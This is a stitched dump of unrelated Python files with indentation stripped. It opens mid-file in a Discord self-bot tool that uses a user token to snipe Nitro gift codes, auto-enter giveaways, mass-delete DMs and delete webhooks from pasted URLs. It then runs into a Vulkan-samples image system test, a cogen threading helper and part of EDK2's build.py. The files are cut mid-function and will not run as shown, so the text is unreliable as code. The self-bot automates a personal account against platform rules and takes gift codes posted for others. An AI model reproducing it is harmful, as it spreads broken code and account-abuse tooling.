print(f"""\t\t[#] Sniped code: {code} From {ctx.author.name}#{ctx.author.discriminator} [{ctx.guild.name}>{ctx.channel.name}]""")
except:
print(f"""\t\t[#] Sniped code: {code} From {ctx.author.name}#{ctx.author.discriminator}""")
if 'This gift has been redeemed already' in str(result.content):
print("\t\t[#] Code has been already redeemed", end='')
elif 'nitro' in str(result.content):
print("\t\t[#] Code applied", end='')
elif 'Unknown Gift Code' in str(result.content):
print("\t\t[#] Invalid Code", end='')
print(" Delay:" + " %.3fs" % delay)
elif (('**giveaway**' in str(ctx.content).lower() or ('react with' in str(ctx.content).lower() and 'giveaway' in str(ctx.content).lower()))):
try:
await asyncio.sleep(randint(100, 200))
await ctx.add_reaction("🎉")
print(f"""\t[#] Enter Giveaway [{ctx.guild.name}>{ctx.channel.name}]""")
except:
print(f"""\t[#] Failed to enter Giveaway [{ctx.guild.name}>{ctx.channel.name}]""")
elif '<@' + str(bot.user.id) + '>' in ctx.content and ('giveaway' in str(ctx.content).lower() or 'won' in ctx.content or 'winner' in str(ctx.content).lower()):
try:
won = re.search("\t[#]You won the \*\*(.*)\*\*", ctx.content).group(1)
except:
won = "UNKNOWN"
print(f"""[#] Congratulations! You won Giveaway: {won} [{ctx.guild.name}>{ctx.channel.name}]""")
bot.run(usertoken, bot=False)
except:
print(f"""\t[!] Error\n""")
main()
elif choice == "cleardm":
prefix = "!"
bot = commands.Bot(command_prefix=prefix, self_bot=True)
bot.remove_command("help")
print(f"""\t[#] Write "!clear" in one of your DMs to delete your messages\n""")
@bot.command()
async def clear(ctx, limit: int=None):
passed = 0
failed = 0
async for msg in ctx.message.channel.history(limit=limit):
if msg.author.id == bot.user.id:
try:
await msg.delete()
passed += 1
except:
failed += 1
print(f"\t[!] Removed {passed} messages with {failed} fails\n")
main()
bot.run(usertoken, bot=False)
elif choice == "housechanger":
house = str(input(f"""\t[#] Which house do you want to be part of: \n\t\t[01] Bravery\n\t\t[02] Brilliance\n\t\t[03] Balance\n\t[+] Enter your House choice: """))
if house == "1" or house == "01":
payload = {'house_id': 1}
elif house == "2" or house == "02":
payload = {'house_id': 2}
elif house == "3" or house == "03":
payload = {'house_id': 3}
else:
print(f"""\t\t[!] Invalid Choice""")
main()
r = requests.post('https://discordapp.com/api/v6/hypesquad/online', headers=getheaders(usertoken), json=payload, timeout=10)
if r.status_code == 204:
print(f""" \t[!] Hypesquad House changed\n""")
main()
else:
print(f"\t[!] Error occured while trying to change the HypeSquad house\n")
main()
elif choice == "schanger":
status = input(f"""\t[#] Choose Custom Status: """)
CustomStatus = {"custom_status": {"text": status}}
try:
r = requests.patch("https://discord.com/api/v9/users/@me/settings", headers=getheaders(usertoken), json=CustomStatus)
print(f"""\t[!] Status changed to "{status}"\n""")
main()
except Exception as e:
print(f"\t[!] Error: {e} Occured while trying to change the status\n")
elif choice == "cycle":
amount = int(input(f"""\t[+] Enter number of cycles: """))
modes = cycle(["light", "dark"])
for i in range(amount):
print(f"""\t\t[{i+1}] Theme Color has been changed""")
time.sleep(0.12)
setting = {'theme': next(modes)}
requests.patch("https://discord.com/api/v8/users/@me/settings", headers=getheaders(usertoken), json=setting)
print(f"""\t[#] Cycle completed\n""")
main()
elif choice == "wremover":
try:
webhook = input(f"""\t[+] WebHook Link to Delete: """)
requests.delete(webhook.rstrip())
print(f"""\t[!] Webhook has been deleted\n""")
main()
except:
print(f"""\t[!] Webhook could not be deleted\n""")
main()
elif choice == "color":
print(f"""\n\tCode Color\tColor Name\n\t----------\t----------\n\tcolor g\t\tGreen\n\tcolor b\t\tBlue\n\tcolor r\t\tRed\n\tcolor p\t\tPurple\n\tcolor y\t\tYellow\n\tcolor w\t\tWhite\n""")
main()
elif choice == "color g":
os.system('color a')
print()
main()
elif choice == "color b":
os.system('color b')
print()
main()
elif choice == "color r":
os.system('color c')
print()
main()
elif choice == "color p":
os.system('color d')
print()
main()
elif choice == "color y":
os.system('color e')
print()
main()
elif choice == "color w":
os.system('color f')
print()
main()
elif choice == "reset":
reset()
main()
elif choice == "help":
print(f"""\n\tCommand\t\tDescription\n\t-------\t\t------------\n\ttools\t\tList the different tools\n\tcolor\t\tChange color theme\n\treset\t\tReset the page\n\thelp\t\tShow help menu\n\texit\t\tClose Rage\n""")
main()
elif choice == "exit":
sys.exit()
else:
print(f"""\tInvalid command\n\tWrite "help" to see the available commands\n""")
main()
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
title()
login() |
system_test.py | '''
Copyright (c) 2019, Arm Limited and Contributors
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import sys, os, math, platform, threading, datetime, subprocess, zipfile, argparse, shutil, struct, imghdr
from time import sleep
from threading import Thread
# Settings (changing these may cause instabilities)
dependencies = ("magick", "cmake", "git", "adb")
multithread = False
sub_tests = []
test_desktop = True
test_android = True
comparison_metric = "MAE"
current_dir = os.getcwd()
script_path = os.path.dirname(os.path.realpath(__file__))
root_path = os.path.join(script_path, "../../")
build_path = ""
build_config = ""
outputs_path = os.path.join(root_path, "output/images/")
tmp_path = os.path.join(script_path, "tmp/")
archive_path = os.path.join(script_path, "artifacts/")
image_ext = ".png"
android_timeout = 60 # How long in seconds should we wait before timing out on Android
check_step = 5
threshold = 0.999 # How similar the images are allowed to be before they pass
class Subtest:
result = False
test_name = ""
platform = ""
def __init__(self, test_name, platform):
self.test_name = test_name
self.platform = platform
def run(self, application_path):
result = True
path = root_path + application_path
arguments = ["--hide", "--test", "{}".format(self.test_name)]
try:
subprocess.run([path] + arguments, cwd=root_path)
except FileNotFoundError:
print("\t\t\t(Error) Couldn't find application ({})".format(path))
result = False
except:
print("\t\t\t(Error) Application error ({})".format(path))
result = False
return result
def test(self):
print("\t\t=== Test started: {} ===".format(self.test_name))
self.result = True
screenshot_path = tmp_path + self.platform + "/"
try:
shutil.move(outputs_path + self.test_name + image_ext, screenshot_path + self.test_name + image_ext)
except FileNotFoundError:
print("\t\t\t(Error) Couldn't find screenshot ({}), perhaps test crashed".format(outputs_path + self.test_name + image_ext))
self.result = False
return
if not test(self.test_name, screenshot_path):
self.result = False
if self.result:
print("\t\t=== Passed! ===")
else:
print("\t\t=== Failed. ===")
def passed(self):
return self.result
class WindowsSubtest(Subtest):
def __init__(self, test_name):
super().__init__(test_name, "Windows")
def run(self):
app_path = "{}app/bin/{}/{}/vulkan_samples.exe".format(build_path, build_config, platform.machine())
return super().run(app_path)
class UnixSubtest(Subtest):
def __init__(self, test_name, platform_type):
super().__init__(test_name, platform_type)
def run(self):
app_path = "{}app/bin/{}/{}/vulkan_samples".format(build_path, build_config, platform.machine())
return super().run(app_path)
class AndroidSubtest(Subtest):
def __init__(self, test_name):
super().__init__(test_name, "Android")
def run(self):
subprocess.run("adb shell am force-stop com.khronos.vulkan_samples")
subprocess.run(["adb", "shell", "am", "start", "-W", "-n", "com.khronos.vulkan_samples/com.khronos.vulkan_samples.BPSampleActivity", "-e", "test", "{0}".format(self.test_name)], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
output = subprocess.check_output("adb shell dumpsys window windows | grep -E 'mCurrentFocus|mFocusedApp' | cut -d . -f 5 | cut -d ' ' -f 1")
activity = "".join(output.decode("utf-8").split())
timeout_counter = 0
while activity == "vulkan_samples" and timeout_counter <= android_timeout:
sleep(check_step)
timeout_counter += check_step
output = subprocess.check_output("adb shell \"dumpsys window windows | grep -E 'mCurrentFocus|mFocusedApp' | cut -d . -f 5 | cut -d ' ' -f 1\"")
activity = "".join(output.decode("utf-8").split())
if timeout_counter <= android_timeout:
subprocess.run(["adb", "pull", "/sdcard/Android/data/com.khronos.vulkan_samples/files/" + outputs_path + self.test_name + image_ext, root_path + outputs_path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
return True
else:
print("\t\t\t(Error) Timed out")
return False
def create_app(platform, test_name):
"""
@brief Creates a buildable and runnable test, returning it
@param platform An integer representing what platform the app should be built for
@param test_name The name of the test, used to create the app
@return A runnable application
"""
if platform == "Windows":
return WindowsSubtest(test_name)
elif platform in ["Linux", "Darwin"]:
return UnixSubtest(test_name, platform)
elif platform == "Android":
return AndroidSubtest(test_name)
else:
print("Error: cannot create subtest, cant find associated platform.")
exit(1)
def get_command(command):
"""
@brief Ensures command can be executed on each platform
@param command The commands name
@return A platform appropriate command
"""
if platform.system() == "Windows":
command += ".exe"
return command
def get_resolution(image):
"""
@brief Gets the width and height of a given image
@param image The path to the image relative to this script
@return A string denoting the resolution in the format (WxH)
"""
return subprocess.check_output([get_command("magick"), "identify", "-format", "\"%[fx:w]x%[fx:h]\"", image]).decode("utf-8")[1:-1]
def compare(metric, base_image, test_image, diff_image = "null:"):
"""
@brief Compares two images by their mean absolute error (changing the order of these parameters will change the contents of diff_image)
@param metric The type of image comparison you want to invoke
@param base_image The relative path to the image to base the test on
@param test_image The relative path to compare the base_image with
@param diff_image The relative path to the output image of the difference between the two images, default "null:"
@return A float clamped between 0 and 1 denoting how similar the images are (1 being identical, 0 being opposite)
"""
output = ""
try:
output = subprocess.check_output([get_command("magick"), "compare", "-metric", metric, base_image, test_image, diff_image], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
output = e.output
pass
output = output.decode("utf-8")
return max(0.0, min(1.0 - float(output[output.find("(")+1:output.find(")")]), 1.0))
def test(test_name, screenshot_path):
"""
@brief Tests each screenshot within the tmp/ folder against the goldtest, saving the results if it fails
@param test_name The name of the test, used to retrieve the respective goldtest image
@param screenshot_path The directory where to store screenshots
@return True if the image tests pass
"""
# Run test
result = False
image = test_name + image_ext
base_image = screenshot_path + image
test_image = root_path + "assets/gold/{0}/{1}.png".format(test_name, get_resolution(base_image))
if not os.path.isfile(test_image):
print("\t\t\t(Error) Resolution not supported, gold image not found ({})".format(test_image))
return False
diff_image = "{0}{1}-diff.png".format(screenshot_path, image[0:image.find(".")])
print("\t\t\t(Comparing images...) '{0}' with '{1}':".format(base_image, test_image), end = " ", flush = True)
similarity = compare(comparison_metric, base_image, test_image, diff_image)
print("{}%".format(100*math.floor(similarity*10000)/10000))
# Remove images if it is identical
if similarity >= threshold:
os.remove(base_image)
os.remove(diff_image)
result = True
return result
def execute(app):
print("\t=== Running {} on {} ===".format(app.test_name, app.platform))
if app.run():
app.test()
def main():
"""
@brief Runs the system test
"""
if test_android and not os.path.exists(tmp_path + "Android/"):
os.makedirs(tmp_path + "Android/")
if test_desktop and not os.path.exists(tmp_path + platform.system()):
os.makedirs(tmp_path + platform.system())
print("=== System Test started! ===")
results = []
# Create tests
apps = []
for test_name in sub_tests:
if test_android:
apps.append(create_app("Android", test_name))
if test_desktop:
apps.append(create_app(platform.system(), test_name))
# Run tests
if not multithread:
for app in apps:
if app:
execute(app)
else:
threads = []
for app in apps:
process = Thread(target=execute, args=[app])
process.start()
threads.append(process)
for thread in threads:
thread.join()
# Evaluate system test
passed = 0
failed = 0
for app in apps:
results.append(app.passed())
for result in results:
if result:
passed += 1
else:
failed += 1
if failed == 0:
print("=== Success: All tests passed! ===")
shutil.rmtree(tmp_path)
exit(0)
else:
print("=== Failed: {} passed - {} failed ===".format(passed, failed))
# If the screenshot directory is not empty, create an archive of the results
if os.listdir(tmp_path) is not None:
print("=== Archiving results into '{}' ===".format(shutil.make_archive(archive_path + "system_test" + "-" + datetime.datetime.now().strftime("%Y.%m.%d-%H.%M.%S"), 'zip', tmp_path)))
shutil.rmtree(tmp_path)
exit(1)
if __name__ == "__main__":
argparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="A simple script that runs, screenshots, and tests your apps against a pre-existing gold")
argparser.add_argument("-B", "--build", required=True, help="relative path to the cmake build directory")
argparser.add_argument("-C", "--config", required=True, help="build configuration to use")
argparser.add_argument("-S", "--subtests", default=os.listdir(os.path.join(script_path, "sub_tests")), nargs="+", help="if set the specified sub tests will be run instead")
argparser.add_argument("-P", "--parallel", action='store_true', help="flag to deploy tests in parallel")
build_group = argparser.add_mutually_exclusive_group()
build_group.add_argument("-D", "--desktop", action='store_false', help="flag to only deploy tests on desktop")
build_group.add_argument("-A", "--android", action='store_false', help="flag to only deploy tests on android")
args = vars(argparser.parse_args())
build_path = args["build"]
build_config = args["config"]
sub_tests = args["subtests"]
test_desktop = args["android"]
test_android = args["desktop"]
multithread = args["parallel"]
if build_path[-1] != "/":
build_path += "/"
# Ensure right dependencies are installed before continuing
runnable = True
for dependency in dependencies:
if shutil.which(dependency) is None:
print("Error: Couldn't find {}, perhaps it is not installed".format(dependency))
runnable = False
if not runnable:
if platform.system() not in ["Linux", "Darwin"]:
exit(1)
else:
print("Unix based system detected. Allowing script to continue to account for aliasing. Please ensure you have the dependencies installed or aliased otherwise the script will fail.")
# If building for android check that a valid device is plugged in
if test_android:
try:
subprocess.check_output("adb get-state")
except:
print("Device not found, disabling Android testing")
test_android = False
else:
print("Device found!")
if multithread:
print("Android doesn't support multithreading, disabling!")
multithread = False
# Run script and handle keyboard interruption
try:
main()
except KeyboardInterrupt:
print("System Test Aborted")
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
inthread.py | from cogen.core import schedulers
from cogen.core.coroutines import coroutine
from cogen.core.events import Operation
from threading import Thread
class RunInThread(Operation):
def __init__(self, callable, args=(), kwargs=None):
self.callable = callable
self.args = args
self.kwargs = kwargs or {}
super(RunInThread, self).__init__()
def _run_thread(self):
self.result = self.callable(*self.args, **self.kwargs)
self.sched.active.append((self, self.coro))
def process(self, sched, coro):
super(RunInThread, self).process(sched, coro)
self.coro = coro
self.sched = sched
thread = self.thread = Thread(target=self._run_thread)
thread.daemon = True
thread.start()
def finalize(self, sched):
super(RunInThread, self).finalize(sched)
return self.result
if __name__ == "__main__":
@coroutine
def test():
def computation(a,b,c):
from time import sleep
print a, b, c
sleep(1)
return a + b + c
for i in xrange(10):
print '>', i
val = yield RunInThread(computation, args=(i+1,i+2,i+3))
print val
@coroutine
def some_stuff_to_keep_sched_alive():
from cogen.core.sockets import Socket
s = Socket()
s.bind(('localhost', 8000))
s.listen(1)
yield s.accept()
s = schedulers.Scheduler()
s.add(test)
s.add(some_stuff_to_keep_sched_alive)
s.run()
|
build.py | ## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2019, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2018, Hewlett Packard Enterprise Development, L.P.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import print_function
import Common.LongFilePathOs as os
import re
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
import multiprocessing
from struct import *
from threading import *
import threading
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.TargetTxtClassObject import TargetTxtClassObject
from Common.ToolDefClassObject import ToolDefClassObject
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import WorkspaceDatabase
from Common.MultipleWorkspace import MultipleWorkspace as mws
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
from GenFds.GenFds import GenFds, GenFdsApi
from collections import OrderedDict, defaultdict
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2018, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if 'PATHEXT' in os.environ:
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData=WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(WorkspaceDir, PackagesPath)
if mws.PACKAGES_PATH:
for Path in mws.PACKAGES_PATH:
if not os.path.exists(Path):
EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData=Path)
elif ' ' in Path:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
Workspace = mws.getWs(Workspace, FilePath)
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != b"":
To(Line.rstrip().decode(encoding='utf-8', errors='ignore'))
else:
break
if ExitFlag.isSet():
break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
BeginTime = time.time()
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first Argument in following Popen().
# It could be a string or sequence. We find that if command is a string in following Popen(),
# ubuntu may fail with an error message that the command is not found.
# So here we may need convert command from string to list instance.
if platform.system() != 'Windows':
if not isinstance(Command, list):
Command = Command.split()
Command = ' '.join(Command)
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Proc.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
if EndOfProcedure is not None:
EndOfProcedure.set()
if Proc is None:
if not isinstance(Command, type("")):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
if Proc.stderr:
StdErrThread.join()
# check the return code of the program
if Proc.returncode != 0:
if not isinstance(Command, type("")):
Command = " ".join(Command)
# print out the Response file and its content when make failure
RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
if os.path.isfile(RespFile):
f = open(RespFile)
RespContent = f.read()
f.close()
EdkLogger.info(RespContent)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other and self.BuildObject == Other.BuildObject \
and Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(Lib, Target) for Lib in self.BuildObject.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in self.BuildObject.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = OrderedDict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = OrderedDict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = OrderedDict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, in case duplicate build
_TaskQueue = OrderedDict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.setName("Build-Task-Scheduler")
SchedulerThread.setDaemon(False)
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which will exits when no pending/ready task and
# indicated to do so, or there's error in running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = list(BuildTask._PendingQueue.keys())
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.isSet():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo, Bt = BuildTask._ReadyQueue.popitem()
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid tense loop
time.sleep(0.01)
# avoid tense loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.isSet():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.isSet() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.getName() for Th in threading.enumerate()))
# avoid tense loop
time.sleep(0.1)
except BaseException as X:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running method exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.isSet()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use threading.Event to communicate this formation to main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.isSet()
## Get error message in running thread
#
